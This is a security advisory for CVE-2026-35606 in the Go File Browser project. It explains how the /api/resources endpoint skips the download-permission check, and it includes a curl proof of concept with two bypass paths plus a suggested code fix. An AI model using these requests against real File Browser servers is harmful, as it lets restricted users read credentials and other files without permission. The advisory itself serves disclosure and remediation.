GHSA-67cg-cpj7-qgc9
Suggest an improvement- Source
- https://github.com/advisories/GHSA-67cg-cpj7-qgc9
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-67cg-cpj7-qgc9/GHSA-67cg-cpj7-qgc9.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-67cg-cpj7-qgc9
- Aliases
-
- CVE-2026-35606
- Published
- 2026-04-08T00:05:09Z
- Modified
- 2026-04-08T00:23:50.109951Z
- Severity
-
- 5.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- File Browser discloses text file content via /api/resources endpoint bypassing Perm.Download check
- Details
-
Summary
The
resourceGetHandlerinhttp/resource.goreturns full text file content without checking thePerm.Downloadpermission flag. All three other content-serving endpoints (/api/raw,/api/preview,/api/subtitle) correctly verify this permission before serving content. A user withdownload: falsecan read any text file within their scope through two bypass paths.Confirmed on v2.62.2 (commit 860c19d).
Root Cause
http/resource.goline 26-33 hardcodesContent: truein the FileOptions without checking download permission:file, err := files.NewFileInfo(&files.FileOptions{ ... Content: true, // Always loads text content, no permission check })Lines 44-63: the
X-Encoding: trueheader path reads the entire file and returns raw bytes asapplication/octet-stream, also without any download check.Compare with the three protected endpoints:
// raw.go:83-85 if !d.user.Perm.Download { return http.StatusAccepted, nil } // preview.go:38-40 if !d.user.Perm.Download { return http.StatusAccepted, nil } // subtitle.go:13-15 if !d.user.Perm.Download { return http.StatusAccepted, nil }PoC
Tested on filebrowser v2.62.2, built from HEAD.
# Create user with download=false via CLI filebrowser users add restricted testuser123456 --perm.download=false # Login TOKEN=$(curl -s http://HOST/api/login -d '{"username":"restricted","password":"testuser123456"}') # BLOCKED: /api/raw correctly enforces download permission curl -s -w "\nHTTP: %{http_code}" http://HOST/api/raw/secret.txt -H "X-Auth: $TOKEN" # → 202 Accepted (empty body) # BYPASS 1: /api/resources with X-Encoding returns raw file content curl -s http://HOST/api/resources/secret.txt -H "X-Auth: $TOKEN" -H "X-Encoding: true" # → 200 OK, body: SECRET_PASSWORD=hunter2 # BYPASS 2: /api/resources JSON includes content field curl -s http://HOST/api/resources/secret.txt -H "X-Auth: $TOKEN" | jq .content # → "SECRET_PASSWORD=hunter2\n"Impact
A user with
download: falsecan read the full content of text files within their authorized scope (up to the 10MBdetectTypelimit). This includes source code, configuration files, credentials, and API tokens stored as text.This bypass does not defeat path authorization. It bypasses only the
Downloadpermission for files the user can otherwise address within their authorized scope. The inconsistency across the four content-serving endpoints (three checkPerm.Download, one does not) indicates this is an oversight, not a design decision.Suggested Fix
Match the existing endpoint behavior (HTTP 202 for denied downloads):
Content: d.user.Perm.Download, // Only load content when permittedAnd add a guard before the X-Encoding raw byte path, matching the existing 202 pattern:
if !d.user.Perm.Download { return http.StatusAccepted, nil }
Update: Fix submitted as PR #5891.
- Database specific
{ "cwe_ids": [ "CWE-862" ], "nvd_published_at": "2026-04-07T17:16:34Z", "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-04-08T00:05:09Z" }- References
Affected packages
Go / github.com/filebrowser/filebrowser/v2
Package
- Name
- github.com/filebrowser/filebrowser/v2
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/filebrowser/filebrowser/v2